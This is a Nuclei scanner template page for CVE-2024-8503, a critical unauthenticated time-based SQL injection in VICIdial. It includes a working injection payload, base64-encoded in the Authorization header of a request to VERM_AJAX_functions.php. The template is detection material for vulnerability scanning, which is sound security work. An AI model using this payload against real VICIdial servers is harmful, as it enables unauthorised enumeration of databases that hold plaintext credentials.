Skip to content
Nuclei Templates

VICIdial - SQL Injection

ID: CVE-2024-8503

Severity: critical

Author: s4e-io

Tags: time-based-sqli,cve,cve2024,vicidial,sqli

Description

Section titled “Description”

An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.

YAML Source

Section titled “YAML Source”
id: CVE-2024-8503


info:
  name: VICIdial - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
  reference:
    - https://en.0day.today/exploit/39746
    - https://github.com/Chocapikk/CVE-2024-8504
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8503
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8503
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.09586
  metadata:
    verified: true
    max-request: 2
    vendor: vicidial
    product: vicidial
    fofa-query: icon_hash="1375401192"
  tags: time-based-sqli,cve,cve2024,vicidial,sqli


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /vicidial/welcome.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Agent Login","Timeclock","Administration")'
          - 'contains(content_type,"text/html")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        @timeout 20s
        GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=


    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(content_type,"text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402206094d79b371e18f6e687f0ae8e8766c8f6ff28620d5e3d483bc7cd1d533e2c60022012ab1835c790c764eb0922c32b1e29bacf706eb4ce5f0382b53e2fc6863170b2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8503.yaml"

View on Github